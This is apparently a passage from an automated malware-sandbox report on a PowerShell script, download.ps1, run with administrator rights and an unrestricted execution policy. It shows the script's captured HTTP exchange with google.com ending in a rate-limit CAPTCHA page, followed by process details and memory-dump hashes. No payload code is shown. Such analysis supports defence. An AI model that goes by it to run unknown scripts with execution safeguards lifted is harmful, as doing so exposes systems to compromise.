                                                                  Set-Cookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG; expires=Sat, 21-Jun-2025 16:40:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/ht
                                                                  Dec 20, 2024 17:40:38.607664108 CET336INData Raw: 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f
                                                                  Data Ascii: ml;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0Larg
                                                                  Dec 20, 2024 17:40:38.608977079 CET522OUTGET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Cookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG
                                                                  Dec 20, 2024 17:40:38.752016068 CET1289INHTTP/1.1 429 Too Many Requests
                                                                  Date: Fri, 20 Dec 2024 16:40:38 GMT
                                                                  Pragma: no-cache
                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Content-Type: text/html
                                                                  Server: HTTP server (unknown)
                                                                  Content-Length: 3076
                                                                  X-XSS-Protection: 0
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                                  Dec 20, 2024 17:40:38.752099991 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                  Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="NMmy5HMBSnYGQpMKootVjAq4urSwWsiP1qsoHTowHBxzswQfVVB5hh7Hz-nemMh2Bi_egyeKK2HtooM_7p48uFaMx13vz-uQh-IovX9qHMYbd6q-eU2j_q9SIkyaftAfgpQbcMyMcsp6t6gbzYRKN3k
                                                                  Dec 20, 2024 17:40:38.752111912 CET778INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                  Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:11:40:32
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                  Imagebase:0x7ff69ce20000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:11:40:32
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff64a0a0000
                                                                  File size:875'008 bytes
                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.55128886743.00007FFEA2810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEA2810000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffea2810000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23aaa944da3bad5dcb9a1c9d9b8c607a61fe01a11428d9d000c1e975ae54249c
                                                                    • Instruction ID: f85ade9daa5cdea286411bfc1279266800e60ff622f963445e164b8f0ed26ea0
                                                                    • Opcode Fuzzy Hash: 23aaa944da3bad5dcb9a1c9d9b8c607a61fe01a11428d9d000c1e975ae54249c
                                                                    • Instruction Fuzzy Hash: F031483160EA8A0FDB89DB2C9C556B57BE1EF96320B0401FBD08CC71A3D919E846C311
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.55128346745.00007FFEA26FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEA26FD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffea26fd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cb86974a78af0fb12822505da5d1fd4191bf4aaddff20ee06dcee245284beffe
                                                                    • Instruction ID: 5cc8964ae2a0c2a64c72ca303e7920da503cdeaa02ab9dbee72b1bab09dbcd26
                                                                    • Opcode Fuzzy Hash: cb86974a78af0fb12822505da5d1fd4191bf4aaddff20ee06dcee245284beffe
                                                                    • Instruction Fuzzy Hash: E811603150DF088F9BA8EF2DE4859567BE0FB98320B100A6FD449C7666D731E881CBC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.55128886743.00007FFEA2810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEA2810000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffea2810000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a3e9bbf89d9374084bd834154e86d6e82320738ca64f3bc25d7cc1e96ded45d
                                                                    • Instruction ID: ad93be902875c14347798210937fb3259c626207f2af4c7fd3987ea819497e59
                                                                    • Opcode Fuzzy Hash: 0a3e9bbf89d9374084bd834154e86d6e82320738ca64f3bc25d7cc1e96ded45d
                                                                    • Instruction Fuzzy Hash: CF01677111CB0D4FD744EF0CE451AA9B7E0FB99324F10056EE58AC36A5D636E892CB46
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.55132903714.00007FFEA2AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEA2AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffea2ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77fff716fccd6b720e99135f86d5d8aa50766cf6e6f028231c7d45e596816bfe
                                                                    • Instruction ID: a5b3c4a4ad2fff3b8de061463143395b3317e9f53fd3c4c821b213c25c36fd5e
                                                                    • Opcode Fuzzy Hash: 77fff716fccd6b720e99135f86d5d8aa50766cf6e6f028231c7d45e596816bfe
                                                                    • Instruction Fuzzy Hash: 87F03031A0C4198FE758EA4CE441AA877D1FF44324F1401B6E14DC7562DA62EC51C795